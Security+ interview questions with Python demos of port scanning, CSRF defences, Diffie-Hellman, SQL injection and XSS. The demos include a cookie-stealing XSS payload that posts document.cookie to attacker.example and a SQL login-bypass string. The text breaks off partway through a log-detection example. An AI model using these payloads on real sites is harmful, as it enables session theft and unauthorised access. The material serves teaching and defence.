Security+ interview questions


What is two-factor authentication and how can it be implemented for public websites?

2FA (also called two-step verification or dual-factor authentication) makes the user present two different kinds of evidence before access is granted, typically something they know (a password) plus something they have (a one-time code from an authenticator app, an SMS code, or a FIDO2 security key), so that a stolen or guessed password alone is not enough to log in. Public websites such as Twitter, Microsoft and LinkedIn offer it as an extra layer on top of the normal password login: the user turns it on under the account's security settings, enrols an authenticator app or security key, and keeps the recovery codes somewhere safe. Where the site offers a choice, app-based codes or hardware keys are preferable to SMS, which is exposed to SIM-swap attacks.

What is the difference between black hat, white hat, and grey hat hackers?

A black-hat hacker tries to gain unauthorized access to a system or network to steal data or cause damage for malicious purposes. White-hat hackers, also called ethical hackers, use the same tools, methodologies and tactics with the owner's permission to find and fix vulnerabilities and security holes before attackers do; many large companies employ them. A grey-hat hacker is a security expert who sometimes breaks rules or ethical standards (for example, probing a system without permission and then reporting what they found) but without the malicious intent of a black hat.

What is a Botnet?

A botnet is a group of internet-connected devices (servers, PCs, mobile and IoT devices) that have been infected with malware and are controlled remotely by an operator through command-and-control (C2) infrastructure. Botnets are used to steal data, send spam, run distributed denial-of-service (DDoS) attacks, and as a foothold that gives the operator access to each infected device and the networks it can reach.

What is a DDoS attack and how can it be stopped/prevented?

A DDoS (distributed denial of service) attack is a malicious attempt to disrupt the normal traffic of a server, service or network by flooding it with more requests or packets than it can handle, so that legitimate requests are not served. The traffic comes from many compromised or spoofed sources at once (often a botnet), which is what makes it distributed and hard to block at the source. It can be mitigated rather than fully prevented: rate-limit and filter traffic at the edge, use upstream or cloud-based scrubbing and anycast/CDN capacity to absorb volumetric floods, block traffic by source or signature once an attack is identified, and keep enough bandwidth and autoscaling headroom that the service degrades gracefully instead of falling over.

What is a cybersecurity risk assessment?

A cybersecurity risk assessment identifies the information assets that are exposed to cyber attack (customer data, hardware, laptops, servers and so on) and evaluates the risks that could affect those assets. It is performed to identify, evaluate and prioritise risks across the organisation so that resources go to the biggest problems first. A typical assessment covers:
- the threats relevant to the organisation
- internal and external vulnerabilities
- the impact if each vulnerability were exploited, combined with its likelihood

What is the difference between a false positive and a false negative in IDS?

A false positive is an alert for something that is not actually an attack: the IDS fires on legitimate network activity, or a scanner reports a vulnerability that does not exist (a false alarm). A false negative is the opposite: a real intrusion or vulnerability that the IDS or scanner fails to detect. False negatives are the more dangerous of the two because an attack succeeds without anyone noticing, so a false positive is usually the more acceptable error; in practice, though, a high false-positive rate causes alert fatigue and leads analysts to ignore the alerts that matter, so both rates have to be tuned.

What is the use of a firewall and how can it be implemented?

A firewall is a security control that monitors and filters network traffic between zones of different trust (for example between the internet and a private network) according to a set of rules. It blocks unauthorized access to the private network from outside and limits which services are exposed; on its own it is not a defence against malware, viruses or worms that arrive over a channel the rules allow. Steps for setting up and configuring a firewall device:
- Change the default administrator password
- Disable remote administration, or restrict it to a management network
- Start from a default-deny policy and open only the ports that are needed, for example port forwarding for an FTP or web server that must be reachable
- If the network already has a DHCP server, disable the firewall's own DHCP server so the two do not conflict
- Apply a documented security policy, log what is blocked, and review the rules regularly

What is the three-way handshake?

The three-way handshake is how TCP (Transmission Control Protocol) establishes a reliable connection between a client and a server before any application data is sent. It is called three-way because three segments are exchanged:
1. SYN: the client sends a segment with the SYN flag set and an initial sequence number to the server.
2. SYN-ACK: if the server is up and listening on that port, it replies with both SYN and ACK set, acknowledging the client's sequence number and sending its own.
3. ACK: the client acknowledges the server's sequence number; the connection is now established and both sides can send data.
A closed port answers the SYN with RST instead, and a firewalled port typically answers nothing, which is why port scanners can infer a port's state from how the handshake fails.

What is the use of a trace route?

Traceroute is a network diagnostic tool that maps the path packets take across an IP network from source to destination. It sends probes with increasing TTL (time-to-live) values; each router that decrements the TTL to zero returns an ICMP time-exceeded message, which reveals that hop's address. For every hop it records the round-trip time, so it shows both the route taken and where latency or packet loss appears along it.

What is the use of Address Resolution Protocol?

ARP (Address Resolution Protocol) maps IP network addresses to physical (link-layer) addresses such as Ethernet MAC addresses on a local network. It resolves 32-bit IPv4 addresses to 48-bit MAC addresses: a host broadcasts a request asking who holds a given IP address, and the owner replies with its MAC address. This is needed because IPv4 addresses are 32 bits long while Ethernet hardware addresses are 48 bits long, and frames on the local segment are delivered by MAC address. (The reverse mapping is done by RARP, and IPv6 uses Neighbor Discovery instead of ARP.) Because ARP has no authentication, forged replies (ARP spoofing) can redirect local traffic through an attacker's machine.

What is active reconnaissance?

Active reconnaissance is the phase of an attack in which the intruder interacts directly with the target system to gather information about it and its vulnerabilities, as opposed to passive reconnaissance, which only uses public or observed data. Attackers most commonly use port scanning to discover open ports and the services behind them, then fingerprint versions and look for exploitable vulnerabilities in those services. Because the target is touched directly, active reconnaissance leaves traces in firewall and IDS logs.

How can identity theft be prevented?

Steps that help prevent identity theft:
- Use strong, unique passwords for each account
- Avoid sharing confidential information online, especially on social media
- Shop only from known and trusted websites
- Keep the browser on its latest version
- Install and maintain anti-malware and anti-spyware tools
- Use dedicated security controls for financial data
- Keep the operating system and software up to date
- Protect your SSN (Social Security Number) and other government identifiers

What is the difference between information protection and information assurance?

Information protection: protects data from unauthorized access using encryption, access controls and security software.
Information assurance: keeps data trustworthy and usable by ensuring its availability, integrity, authenticity, confidentiality and non-repudiation.

How do you keep yourself updated with the latest cybersecurity news?

- Follow news websites and blogs from security experts
- Browse security-related topics on social media
- Check vulnerability alert feeds and vendor advisory sites
- Attend cybersecurity live events and conferences

What is chain of custody?

Chain of custody is the provable record that evidence is in the same state as when it was originally acquired and has not been altered before being admitted as evidence. In legal terms it is a chronological documentation or paper trail that records the sequence of custody, control, transfer, analysis and disposition of electronic or physical evidence, including who handled it, when, and why. For digital evidence this typically includes a cryptographic hash taken at acquisition so that later copies can be shown to be identical to the original.

What is port scanning?

Port scanning is a technique (and the class of tool that performs it) for identifying which ports on a host are open and which services are reachable on them. Security administrators use it to find exposed services and verify firewall rules; attackers use it to find targets and the vulnerable services to exploit. Common port-scanning techniques:
- Ping scan (host discovery only)
- TCP connect scan (completes the full three-way handshake)
- TCP half-open (SYN) scan: sends a SYN and classifies the port from the SYN-ACK or RST reply without completing the handshake
- Stealth scans that send unusual flag combinations: NULL, FIN and Xmas scans
- UDP scan
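The TCP connect scan described above (and the active-reconnaissance step before it), as an added example rather than anything from the original flashcards. It starts a throwaway listener on 127.0.0.1 as a constructed target, then probes a range of ports around it and classifies each as open, closed or filtered from how the handshake behaves; the port numbers and the 0.5 s timeout are assumptions for the demo.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def start_local_listener():
    """Throwaway TCP service on 127.0.0.1 used as the scan target for this demo (constructed;
    port 0 lets the OS pick a free port). Returns the socket and its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return                  # listener closed
            conn.close()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def probe(host, port, timeout=0.5):
    """TCP connect() scan of one port. connect() completes the full three-way handshake,
    which is why this is the noisiest technique: the target application sees and logs it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return port, "open"         # SYN-ACK received, handshake completed
        except ConnectionRefusedError:
            return port, "closed"       # RST came back: nothing is listening
        except (socket.timeout, OSError):
            return port, "filtered"     # no answer: typically dropped by a firewall


def connect_scan(host, ports, workers=32):
    """Scan the given ports concurrently; returns {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(lambda p: probe(host, p), ports))


def open_ports(host, ports):
    return sorted(p for p, state in connect_scan(host, ports).items() if state == "open")


if __name__ == "__main__":
    srv, port = start_local_listener()
    for p, state in sorted(connect_scan("127.0.0.1", range(port - 3, port + 4)).items()):
        print(p, state)
    srv.close()
```

Only the listener's own port should come back open; its neighbours answer with RST and show as closed. A half-open (SYN) scan needs raw sockets and root, which is why tools such as nmap default to it only when run with privileges.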

What is the difference between hashing and encryption?

Both hashing and encryption turn readable data into an unreadable form, but they serve different purposes. Encryption is reversible: whoever holds the right key can decrypt the ciphertext back to the original data, so it is used for confidentiality. Hashing is a one-way function with no key: it produces a fixed-length digest from which the original data cannot be recovered, so it is used for integrity checks, digital signatures and password storage.

What are the techniques used in preventing a Brute Force Attack?

A brute-force attack is a trial-and-error method in which an attacker (usually with automated tooling) tries many candidate values, such as passwords or encryption keys, until one works, relying on computing power rather than any cleverness about the target. Brute-force attacks can be slowed down or defeated by:
- Password complexity and length: requiring a mix of character types and a sensible minimum length makes the search space far larger
- Limiting login attempts: lock the account or throttle the source after a set number of failures
- 2FA: even a correctly guessed password is not enough on its own
- For stored passwords, a slow salted hash (bcrypt, scrypt, Argon2 or PBKDF2) that makes every offline guess expensive

What is the CIA triad?

The CIA triad (confidentiality, integrity, availability) is the model used to frame information-security policy within an organisation:
- Confidentiality: rules and controls that limit access to information to those authorised to see it
- Integrity: assurance that information is accurate, trustworthy and has not been tampered with
- Availability: reliable, timely access to data and systems for authorised users

How do you prevent CSRF?

CSRF stands for Cross-Site Request Forgery: an attacker's page causes the victim's browser to send a request to a site where the victim is already logged in, and because the browser automatically attaches the session cookie, the site carries out the action (a transfer, a password change) as if the victim had asked for it. Preventing it is primarily the site's job:
- Require a secret anti-CSRF token on every state-changing request (the synchronizer-token pattern); an attacker's cross-site page cannot read it
- Set the SameSite attribute on session cookies so the browser does not attach them to cross-site requests
- Check the Origin or Referer header on state-changing requests
- Require re-authentication for sensitive actions
On the user side, logging out of banking sites when finished, not opening untrusted links or emails while authenticated to a financial site, not saving financial logins in the browser, and keeping the browser updated all reduce exposure. Antivirus software does not address CSRF, and disabling scripts only partly helps, since an image tag or a form the victim submits can carry the forged request without any script running.
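The server-side checks above, as an added example that is not part of the original card: a session-bound synchronizer token, a SameSite session cookie, and a request filter that also checks the Origin header. The server secret, the site origin https://bank.example and the attacker origin are constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret for the demo; a real app loads it from configuration.
SERVER_SECRET = secrets.token_bytes(32)
SITE_ORIGIN = "https://bank.example"      # assumed origin of the protected application


def csrf_token_for(session_id, secret=SERVER_SECRET):
    """Synchronizer token bound to the session: HMAC(secret, session_id).
    Stateless, unguessable without the secret, and useless in any other session."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def session_cookie(session_id):
    """Set-Cookie value. SameSite=Lax stops the browser attaching the cookie to cross-site
    POSTs, which defeats the classic CSRF form on its own; Secure and HttpOnly are the usual
    companions."""
    return f"session={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def is_request_allowed(method, session_id, submitted_token, origin_header,
                       secret=SERVER_SECRET, site_origin=SITE_ORIGIN):
    """Checks a server applies before acting on a state-changing request."""
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True                       # safe methods must not change state: no token needed
    if not submitted_token:
        return False                      # the attacker's cross-site form cannot read our token
    expected = csrf_token_for(session_id, secret)
    if not hmac.compare_digest(expected, submitted_token):
        return False
    # Defence in depth: browsers add Origin to cross-site POSTs and page script cannot forge it.
    if origin_header is not None and origin_header != site_origin:
        return False
    return True


if __name__ == "__main__":
    sid = "7f3a"
    good = csrf_token_for(sid)
    print(session_cookie(sid))
    # Victim submits the site's own form: allowed.
    print(is_request_allowed("POST", sid, good, SITE_ORIGIN))
    # Attacker's page auto-submits a transfer form: no token, foreign Origin, rejected.
    print(is_request_allowed("POST", sid, None, "https://attacker.example"))
```

The token is derived from the session rather than stored, so nothing extra has to be kept server-side; rotating SERVER_SECRET invalidates all outstanding forms, which is acceptable for a secret that changes rarely.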

What is cognitive security?

Cognitive security applies AI techniques to identifying threats and protecting physical and digital systems in a way modelled on human reasoning. Self-learning security systems use pattern recognition, natural-language processing and data mining to analyse unstructured data and adapt to new threats, mimicking the way an analyst learns from experience.

What do you understand by compliance in cybersecurity?

Compliance means adhering to a set of standards set by the organisation itself, by government, or by an independent body (for example PCI DSS or ISO 27001). It helps define and reach IT security targets and mitigates threats through required processes such as vulnerability management, logging and access review. Compliance is a baseline, not a guarantee: a compliant system can still be insecure.

What is Cross-Site Scripting and how can it be prevented?

Cross-Site Scripting (XSS) is a client-side injection attack in which an attacker gets malicious script to execute in a victim's web browser by injecting it into a page the victim trusts, typically through user input that the application echoes into its HTML without proper encoding. The following practices prevent XSS:
- Output encoding: escape special characters according to the context the data is inserted into (HTML body, attribute, JavaScript, URL)
- Validating user input and rejecting what does not match the expected format
- Using a sanitising HTML filter where rich text has to be allowed
- Using anti-XSS libraries or frameworks that encode by default, plus a Content Security Policy to limit what any injected script can do

What is cryptography?

Cryptography is the practice of transforming data into an encoded form so that it can be stored or transmitted confidentially and only the intended parties, who hold the right keys, can read it; it also provides integrity and authenticity through hashes, message authentication codes and digital signatures.

What is cybersecurity?

Cybersecurity is the protection of internet-connected systems, including hardware, software and electronic data, from cyber attacks. In a computing context it refers to protection against unauthorized access, modification or disruption.

What is the difference between Diffie-Hellman and RSA?

Diffie-Hellman is a key agreement protocol: two parties each generate a private value, exchange only the corresponding public values over an insecure channel, and independently compute the same shared secret, which is then used as a symmetric key for encrypting messages between them. The shared key itself is never transmitted, and an eavesdropper who sees both public values cannot derive it. Diffie-Hellman does not authenticate the parties, so on its own it is open to a man-in-the-middle; TLS combines it with certificates for that reason.
RSA is an asymmetric (public-key) algorithm with two different keys. The public key can be given to anyone and is used to encrypt data or verify signatures; data encrypted with it can only be decrypted with the matching private key, which is kept secret and is also what creates signatures. RSA can be used for encryption, signatures and key transport, whereas Diffie-Hellman is only for agreeing on keys.

What is the need for DNS monitoring?

DNS (Domain Name System) translates user-friendly domain names into the IP addresses computers use, so that services can be reached by a memorable name rather than an address. DNS monitoring means watching an organisation's DNS records and resolution behaviour to make sure traffic is routed correctly to its website, email and other services, and to catch tampering or abuse: unauthorised record changes, domain hijacking, spoofing or cache poisoning, and malware using DNS for command-and-control or data exfiltration (for example unusual query volumes or long random-looking subdomains).

Define data leakage and its types

Data leakage is the unauthorized transmission of data from inside an organisation to an external destination or to a party not entitled to it. It can happen physically (printouts, removable media) or electronically, and most often occurs via the web, email and mobile storage devices. Types of data leakage:
- The accidental breach: the majority of incidents are accidental, for example an employee choosing the wrong recipient when sending confidential data
- The disgruntled or ill-intentioned employee: an authorised insider deliberately sends confidential data to an unauthorised party
- Electronic communications with malicious intent: every electronic channel that can transfer files or reach external resources over the internet (email, messaging, cloud storage, USB) can be abused to move data out

What is the difference between hashing and salting?

Hashing is a one-way function that maps input data to a fixed-length value; it is used for integrity checks and for storing passwords, since the password itself never has to be kept. Salting is an extra step applied before hashing: a random value (the salt) is combined with the password so that the resulting hash is different for every user even when two users choose the same password, which defeats precomputed lookup and rainbow tables. The salt is stored alongside the hash; it does not need to be secret, only unique.

How do you protect data in transit vs. rest?

Data in transit: data actively moving from one location to another across the internet or a private network. Protect it by encrypting sensitive data before sending it and by using encrypted connections (TLS, HTTPS, SSH, VPNs); SSL is the obsolete predecessor of TLS and should no longer be enabled.
Data at rest: data that is not moving, stored on hard drives, flash drives, databases or backups. Protect it by encrypting sensitive files before storing them, by using full-disk or database-level encryption, and by controlling who can access the storage and the keys.

How do you prevent Man-in-the-middle attacks?

- Use strong encryption on wireless access points (WPA2 or WPA3; WEP and the original WPA are broken and do not keep unauthorised users out)
- Use a VPN on untrusted networks so that traffic is encrypted end to end with key-based encryption
- Use public-key based authentication at the relevant layers of the stack (certificates, SSH host keys) so each side can verify who it is really talking to
- Use HTTPS, with HSTS, for all web traffic so that it is encrypted and the server is authenticated by its certificate; never click past certificate warnings
- Watch for ARP spoofing and rogue DNS on local networks, which are the usual ways an attacker inserts themselves into the path

What is forward secrecy and how does it work?

Forward secrecy (also called perfect forward secrecy, PFS) is a property of certain key-agreement protocols: even if the server's long-term private key is compromised later, previously recorded sessions cannot be decrypted, because the session keys were not derived from that long-term key. It is achieved with ephemeral Diffie-Hellman key exchange (DHE or ECDHE in TLS): each session generates fresh, temporary key-exchange values that are discarded afterwards, and the long-term key is used only to sign them. By contrast, RSA key transport, where the client encrypts the session key with the server's public key, gives no forward secrecy, since anyone who later obtains the private key can decrypt every recorded session key.
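The Diffie-Hellman exchange from the earlier card and the forward-secrecy property above, as one added example that is not from the original flashcards. Both sides' messages are shown, the eavesdropper's view is just the two public values, and ephemeral exponents make every session key different. The group (P = 2**127 - 1, G = 2) is a toy chosen for readability, not a real parameter set; deployments use the RFC 7919 groups or elliptic-curve DH.

```python
import hashlib
import secrets

# Toy group for the demo (assumption, illustration only): P is the Mersenne prime 2**127 - 1
# and G = 2. Real deployments use a standardised group (RFC 7919) or elliptic-curve DH.
P = 2**127 - 1
G = 2


def dh_keypair():
    """Fresh (ephemeral) private exponent x and its public value g^x mod p."""
    priv = 2 + secrets.randbelow(P - 3)        # x in [2, P-2]
    return priv, pow(G, priv, P)


def dh_shared(priv, peer_pub):
    """g^(xy) mod p, from my private exponent and the peer's public value."""
    return pow(peer_pub, priv, P)


def session_key(shared):
    """Never use raw DH output as a key: pass it through a KDF (here a plain SHA-256)."""
    width = (P.bit_length() + 7) // 8
    return hashlib.sha256(shared.to_bytes(width, "big")).hexdigest()


def run_session():
    """One TLS-style DHE exchange. Only A and B cross the wire; a and b never leave their hosts."""
    a, A = dh_keypair()                        # client
    b, B = dh_keypair()                        # server
    transcript = {"client->server": A, "server->client": B}   # what an eavesdropper records
    k_client = session_key(dh_shared(a, B))
    k_server = session_key(dh_shared(b, A))
    return k_client, k_server, transcript


def keys_agree(k_client, k_server):
    return k_client == k_server


def forward_secrecy_holds(n_sessions=5):
    """With ephemeral exponents every session yields a different key, so compromising one
    session's key, or the server's long-term signing key, does not unlock the others."""
    keys = {run_session()[0] for _ in range(n_sessions)}
    return len(keys) == n_sessions


if __name__ == "__main__":
    kc, ks, wire = run_session()
    print("on the wire:", wire)
    print("keys agree:", keys_agree(kc, ks))
    print("forward secrecy across sessions:", forward_secrecy_holds())
```

Note what is missing: nothing here proves who sent A or B, which is exactly the man-in-the-middle gap that TLS closes by having the server sign its ephemeral value with its certificate key.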

Explain system hardening

System hardening is the combination of tools, techniques and configuration practices used to reduce vulnerabilities in systems, applications, firmware and other components across an organisation. Its purpose is to lower security risk by removing unnecessary functionality and access (unused services, accounts, open ports, default credentials) and so shrinking the system's attack surface. Types of system hardening include:
- Database hardening
- Operating system hardening
- Application hardening
- Server hardening
- Network hardening

What is the difference between HIDS and NIDS?

HIDS (host-based IDS) and NIDS (network-based IDS) are both intrusion detection systems with the same purpose, detecting intrusions, but they differ in where they sit and what they see. A HIDS is installed on a particular host and monitors that device's traffic, logs, processes and file changes, so it sees what happens on the host after traffic has been decrypted. A NIDS is deployed at a network vantage point (a span port or tap) and monitors the traffic of all devices on that segment, but it cannot see inside encrypted traffic or what happens on the endpoint. The two are complementary.

What are HTTP response code?

HTTP response codes tell the client whether and how a particular HTTP request was completed:
- 1xx (Informational): the request has been received and processing is continuing
- 2xx (Success): the request was successfully received, understood and accepted
- 3xx (Redirection): further action must be taken by the client to complete the request
- 4xx (Client Error): the request cannot be fulfilled, for example because of incorrect syntax, missing authentication or a missing resource
- 5xx (Server Error): the server failed to fulfil a valid request

What is the difference between IDS and IPS?

Intrusion Detection System (IDS): detects intrusions but cannot prevent them. It is a monitoring system that sits out of band (on a tap or span port) and needs a human or another system to act on its alerts.
Intrusion Prevention System (IPS): detects and blocks intrusions. It is a control system that sits inline in the traffic path, so a false positive here blocks legitimate traffic. Both need a regularly updated signature or threat database to recognise the latest attacks.

List the common types of cybersecurity attacks

- Malware
- SQL injection
- Cross-site scripting (XSS)
- Denial of service (DoS/DDoS)
- Man-in-the-middle attack
- Credential reuse (credential stuffing)
- Phishing
- Session hijacking

How often should you perform patch management?

Patches should be applied as soon as practical after release, with the delay governed by the severity of what they fix and a quick test in a staging environment to catch regressions. For Windows, a released patch should be deployed to all machines within one month at the latest, and much sooner for critical or actively exploited vulnerabilities. The same applies to network devices and third-party software: patch them promptly after release. A proper patch-management process (inventory, prioritisation by severity, testing, staged roll-out, verification) should be followed rather than patching ad hoc.

What is phishing and how can it be prevented?

Phishing is a fraudulent attempt to impersonate a trusted entity in electronic communication (email, messages, fake websites) in order to obtain sensitive information such as usernames, passwords and card details, or to get the victim to run malware. Phishing can be reduced by:
- Using firewalls and web/email filtering on networks and systems
- Running robust antivirus protection that includes internet security
- Using 2FA wherever possible, ideally phishing-resistant methods such as FIDO2 security keys
- Maintaining good security hygiene and user awareness training
- Never entering sensitive information such as financial or transaction details on web pages you do not trust; check the URL before logging in
- Keeping up to date with the latest phishing techniques

What is Remote Desktop protocol?

RDP (Remote Desktop Protocol) is a Microsoft protocol that gives a user a graphical session on a remote Windows machine over an encrypted channel, carrying screen, keyboard, mouse, clipboard and device redirection between the client and the remote computer or virtual desktop. It lets administrators remotely diagnose and resolve problems on individual users' machines and servers. It supports up to 64,000 separate data channels with provision for multipoint transmission. It listens on TCP port 3389 by default; RDP exposed directly to the internet is a frequent entry point for attackers, so it should be kept behind a VPN or gateway, require Network Level Authentication and MFA, and be monitored for brute-force attempts.

What is the difference between the red team and blue team?

Red team and blue team are terms borrowed from military exercises, and many organisations split security into the two roles. The red team plays the attacker: it emulates real adversaries and tries to exploit weaknesses in the organisation's security to reach defined objectives. The blue team plays the defender: it detects and responds to the red team's activity, identifies the vulnerabilities that were used, and fixes them so that a real attack would not succeed. Exercises where the two work together and share findings as they go are called purple teaming.

What is port blocking within LAN?

Port blocking within a LAN means restricting which services users can reach on the local area network by blocking traffic to specific ports at a switch, router or host firewall, so that a source cannot reach a destination node on that port. Because each application listens on particular ports, blocking the ports that are not needed limits what an attacker or an infected host can reach and closes off avenues for lateral movement inside the network.

What is SQL Injection and how can it be prevented?

SQL injection is a code-injection attack in which an attacker gets malicious SQL statements executed by the database behind a web application, by supplying input that the application concatenates into a query. Attackers use it to bypass authentication and to read, modify or delete data they are not authorised to touch, and sometimes to run commands on the database server. SQL injection can be prevented or mitigated by:
- Using prepared statements with parameterised queries, so user input is never parsed as SQL
- Using stored procedures (written without dynamic SQL inside them)
- Validating user input against an allow-list
- Not exposing database error details in responses to the user
- Keeping the database and application software updated
- Storing database credentials separately and encrypted, and connecting with a least-privilege account
- Disabling shell access and any other database functionality that is not needed
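The first item above, parameterised queries, shown beside the string-concatenated query it replaces. This is an added example, not code from the original card; the in-memory sqlite3 database, the two users and the placeholder "password hashes" are constructed for the demo.

```python
import sqlite3


def setup_db():
    """Constructed in-memory database with two users (password hashes are placeholders)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_hash TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "hash-of-alice-pw", 1), ("bob", "hash-of-bob-pw", 0)])
    return db


def login_vulnerable(db, username, password_hash):
    """User input is pasted into the SQL text, so quotes and comment markers become syntax."""
    sql = (f"SELECT username, is_admin FROM users "
           f"WHERE username = '{username}' AND password_hash = '{password_hash}'")
    return db.execute(sql).fetchone()


def login_safe(db, username, password_hash):
    """Parameterised query: the driver sends values separately from the statement, so the
    same input is compared as a literal string and is never parsed as SQL."""
    sql = "SELECT username, is_admin FROM users WHERE username = ? AND password_hash = ?"
    return db.execute(sql, (username, password_hash)).fetchone()


# Classic authentication bypass: the comment marker removes the password check entirely,
# so the vulnerable query becomes  ... WHERE username = 'alice'--' AND password_hash = '...'
BYPASS_USER = "alice'--"

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable, bypass:", login_vulnerable(db, BYPASS_USER, "wrong"))
    print("safe, bypass:     ", login_safe(db, BYPASS_USER, "wrong"))
    print("safe, real creds: ", login_safe(db, "alice", "hash-of-alice-pw"))
```

The vulnerable function logs the attacker in as the admin user with any password; the parameterised one looks for a user literally named alice'-- and finds nothing. The fix is the same in every driver and ORM: placeholders for values, never string formatting, and the same rule applies to table or column names supplied by users, which placeholders cannot carry and which must therefore be checked against an allow-list.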

Which is more secure SSL/TLS or HTTPS?

The question compares two different things. SSL (Secure Sockets Layer) and its successor TLS (Transport Layer Security) are the cryptographic protocols that provide an encrypted, authenticated channel between two parties across the internet; they sit between the transport layer and the application protocol, and HTTP (like SMTP, IMAP and others) runs on top of them. HTTPS (Hypertext Transfer Protocol Secure) is simply HTTP carried over a TLS connection, which is what gives browsing its encryption, integrity and server authentication. So HTTPS is neither more nor less secure than TLS; its security is the security of the TLS version and configuration underneath it. What matters in practice is using TLS 1.2 or 1.3 with strong cipher suites and a valid certificate, and disabling SSL 2.0/3.0 and TLS 1.0/1.1, which have known weaknesses.

what are salted hashes?

A salt is a random value generated per password. When a properly designed password system receives a new password, it generates a random salt, hashes the salt combined with the password using a slow password-hashing function, and stores the salt together with the resulting hash in its database. At login it looks up the user's salt, repeats the computation on the supplied password and compares the result. Because every user has a different salt, identical passwords produce different hashes, which defeats precomputed dictionary and rainbow-table attacks and forces an attacker to crack each hash separately.

What is security misconfiguration?

Security misconfiguration is a vulnerability that could happen if an application/network/device is susceptible to attack due to an insecure configuration option. It can be as simple as keeping the default username/password unchanged

What is the difference between stored and reflected XSS?

Stored (persistent) XSS: the injected script is saved on the target server, for example in a comment, profile field or message, and is served to every user who later views that content; the victim simply requests the page and receives the malicious script from the server.
Reflected (non-persistent) XSS: the payload is carried in the request itself, typically in a URL parameter the attacker has tricked the victim into clicking, and the server echoes it straight back into the response, where it runs in the victim's browser. It affects only the user who sent that request, so the attacker has to deliver the link to each victim.
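Both variants above, and the output-encoding defence from the earlier XSS card, as one added example that is not from the original flashcards: a constructed guestbook (stored sink), a search echo (reflected sink) and an attribute context, each rendered with and without HTML escaping. The payload and the attacker.example host are constructed for the demo.

```python
from html import escape

# Constructed guestbook store. Anything rendered from it without encoding is a stored-XSS sink.
COMMENTS = []

# Constructed payload: sends the victim's cookie to an attacker-controlled host (assumed name).
PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"


def post_comment(text):
    COMMENTS.append(text)              # storing the raw text is fine; the bug is at render time


def render_comments(safe=True):
    """Stored XSS: every visitor receives whatever an earlier user posted."""
    items = (escape(c, quote=True) if safe else c for c in COMMENTS)
    return "<ul>" + "".join(f"<li>{c}</li>" for c in items) + "</ul>"


def render_search(query, safe=True):
    """Reflected XSS: the payload travels in the request (for example a link the victim clicks)
    and is echoed straight back in that one response."""
    q = escape(query, quote=True) if safe else query
    return f"<p>Results for <b>{q}</b></p>"


def render_profile_link(display_name, safe=True):
    """Attribute context: even without '<', a quote breaks out of the attribute and adds an
    event handler. escape(quote=True) encodes quotes too, which is why it is the right call
    here; JavaScript and URL contexts need their own encoders."""
    name = escape(display_name, quote=True) if safe else display_name
    return f'<a title="{name}" href="/u/me">profile</a>'


def looks_injected(html):
    """Crude check used by the demo: did input survive as live markup?"""
    low = html.lower()
    return "<script" in low or 'onmouseover="' in low


if __name__ == "__main__":
    post_comment(PAYLOAD)
    print(render_comments(safe=False))
    print(render_comments())
    print(render_search(PAYLOAD, safe=False))
    print(render_search(PAYLOAD))
    print(render_profile_link('x" onmouseover="alert(1)', safe=False))
    print(render_profile_link('x" onmouseover="alert(1)'))
```

The stored and reflected cases differ only in where the string came from; the fix is identical, encode at the point of output for the context you are writing into. A Content Security Policy is the backstop for the sink you missed.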

Symmetric vs. Asymmetric encryption?

Symmetric encryption uses a single shared key to both encrypt and decrypt information.
- Speed: fast, so it is preferred for encrypting large amounts of data
- Algorithms: AES, ChaCha20, Blowfish; older ones such as RC4 and DES are broken or deprecated and should not be used
- Purpose: bulk data encryption, for data in transit and at rest
Asymmetric encryption uses a pair of keys, a public key and a private key; what one encrypts only the other can decrypt.
- Speed: much slower than symmetric encryption
- Algorithms: RSA, elliptic-curve schemes (ECC), and Diffie-Hellman for key agreement (PGP is a program that combines both kinds, not an algorithm)
- Purpose: mostly used to exchange or agree on symmetric keys safely, and for digital signatures
Real protocols such as TLS use both: asymmetric cryptography to authenticate and establish a session key, then symmetric encryption for the traffic.

What are the several indicators of compromise (IOC) that organizations should monitor?

Key indicators of compromise that organisations should monitor:
- Unusual outbound network traffic
- Anomalous HTML response sizes
- Geographical irregularities in logins or traffic
- Increases in database read volume
- Log-in red flags (bursts of failures, logins at odd hours, impossible travel)
- Unexpected patching of systems
- Large numbers of requests for the same file
- Web traffic with non-human behaviour
- Suspicious registry or system file changes
- Unusual DNS requests
- Mobile device profile changes
- Bundles of data in the wrong place
- Mismatched port-application traffic
- Anomalies in privileged user account activity
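Three of the indicators above (log-in red flags, brute force, and privileged-account anomalies) expressed as detection rules run over a log, as an added example that is not from the original card. The sshd-style auth log lines are constructed for the demo and use documentation IP ranges; the thresholds (5 failures in 60 s, work hours 08:00 to 18:00, root as the privileged account) and the year assumed for the timestamps are all assumptions you would tune to your environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd-style auth log for the demo (addresses are from documentation ranges).
AUTH_LOG = """\
Mar 10 02:11:03 web1 sshd[2201]: Failed password for root from 203.0.113.7 port 51522 ssh2
Mar 10 02:11:05 web1 sshd[2203]: Failed password for root from 203.0.113.7 port 51530 ssh2
Mar 10 02:11:07 web1 sshd[2205]: Failed password for root from 203.0.113.7 port 51538 ssh2
Mar 10 02:11:09 web1 sshd[2207]: Failed password for root from 203.0.113.7 port 51546 ssh2
Mar 10 02:11:11 web1 sshd[2209]: Failed password for root from 203.0.113.7 port 51554 ssh2
Mar 10 02:11:13 web1 sshd[2211]: Failed password for root from 203.0.113.7 port 51562 ssh2
Mar 10 02:11:20 web1 sshd[2215]: Accepted password for root from 203.0.113.7 port 51601 ssh2
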